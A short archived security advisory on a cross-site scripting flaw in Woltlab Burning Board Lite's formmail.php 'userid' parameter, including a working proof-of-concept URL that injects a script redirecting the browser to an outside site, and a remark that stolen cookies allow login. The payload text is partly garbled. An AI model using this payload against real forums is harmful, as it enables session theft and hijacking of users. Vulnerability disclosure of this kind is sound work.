TUCoPS :: Web BBS :: Frequently Exploited :: hack7278.htm

WBB Woltlab Burning Board Lite formmail.php XSS
Security Advisory: Woltlab Burning Board Lite formmail.php XSS



Advisory Information

--------------------

Advisory name		:  Woltlab Burning Board Lite formmail.php XSS

Discovered by		:  drhankey / it-security23.net

Vendor Name		:  Woltlab

Vendor Homepage		: http://www.woltlab.de 

Software		:  Woltlab Burning Board Lite

Vulnerability Type	:  Cross-Site-Scripting

Vulnerable Versions	:  1.0.0, 1.0.1e, maybe more

Platforms		:  OS Independent, PHP





What is Woltlab Burning Board Lite?

----------------------------------

Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,

a PHP based bulletin board





Vulnerability Description:

-------------------------

formmail.php outputs the "userid"-parameter unfiltered, so its possible to add arbitary Code to the output by using a malformed link.

The Board also allows logging in with stolen cookies.



Proof of Concept:

-----------------

<script>document.lo">http://website/board/formmail.php?userid=1"><script>document.lo cation.href="http://www.it-security23.net"; x="y 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH